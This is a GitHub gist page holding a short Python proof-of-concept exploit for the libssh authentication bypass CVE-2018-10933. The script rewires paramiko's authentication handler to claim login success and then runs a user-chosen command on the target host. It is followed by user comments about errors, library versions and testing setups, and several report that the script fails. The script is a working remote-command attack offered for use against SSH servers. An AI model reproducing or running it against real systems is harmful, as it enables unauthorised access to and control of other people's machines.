#!/usr/bin/env python | |
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1 | |
# untested CVE-2018-10933 | |
import sys, paramiko | |
import logging | |
username = sys.argv[1] | |
hostname = sys.argv[2] | |
command = sys.argv[3] | |
new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[ | |
paramiko.common.MSG_USERAUTH_SUCCESS] | |
def auth_accept(*args, **kwargs): | |
return new_auth_accept(*args, **kwargs) | |
paramiko.auth_handler.AuthHandler._handler_table.update({ | |
paramiko.common.MSG_USERAUTH_REQUEST: auth_accept, | |
}) | |
port = 22 | |
try: | |
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG) | |
client = paramiko.SSHClient() | |
client.set_missing_host_key_policy(paramiko.WarningPolicy) | |
client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key") | |
stdin, stdout, stderr = client.exec_command(command) | |
print stdout.read(), | |
finally: | |
client.close() |
This comment has been minimized.
This comment has been minimized.
IOError: [Errno 2] No such file or directory: 'fake.key' |
This comment has been minimized.
This comment has been minimized.
rute@Kali2018:~/mlosapio-libssh# python ./CVE-2018-10933-test.py rute localhost pwd |
This comment has been minimized.
This comment has been minimized.
pip install paramiko==2.0.8 will work fine!!! |
This comment has been minimized.
This comment has been minimized.
got an error
|
This comment has been minimized.
This comment has been minimized.
type pwd
/Users/username/Documents
|
This comment has been minimized.
This comment has been minimized.
for testing on localhost - https://github.com/SoledaD208/CVE-2018-10933 |
This comment has been minimized.
This comment has been minimized.
I don't know why i throw exception: "paramiko.ssh_exception.AuthenticationException: Authentication failed." |
This comment has been minimized.
This comment has been minimized.
My SSH box looks like this: SSH version : SSH-2.0-libssh_0.7.0 I ran the following command: Below is the output: |
This comment has been minimized.
This comment has been minimized.
As another user pointed out, you must change:
for
I've tested the script on a known vulnerable server and it does return a I would love to see a working exploit targeting a production-use server implementation. According to my experiments, the exploitation is heavily dependent on the server's logic, but I can be wrong. |
This comment has been minimized.
This comment has been minimized.
exec_command not work: DEBUG:paramiko.transport:Authentication type (publickey) not permitted. |
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
from : https://security.stackexchange.com/questions/195834/cve-2018-10933-bypass-ssh-authentication-libssh-vulnerability
anyone can confirm this? |
This comment has been minimized.
This comment has been minimized.
Yes, libssh is an implementation of ssh protocol server library, and OpenSSH is an another implementation |
This comment has been minimized.
This comment has been minimized.
what is wrong here ? installed python-paramiko root@test-VM:/home/test# python3 asd.py |
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
Hi there, I chanced upon this and wondering if you could advise if there is a need for me to have an actual server before I can test this code? Or could I test it locally, eg. In Kali via VirtualBox? |
This comment has been minimized.
not working,
INFO:paramiko.transport:Authentication (publickey) failed.
DEBUG:paramiko.transport:userauth is OK
INFO:paramiko.transport:Authentication (password) failed.
DEBUG:paramiko.transport:EOF in transport thread
Traceback (most recent call last):
paramiko.AuthenticationException: Authentication failed.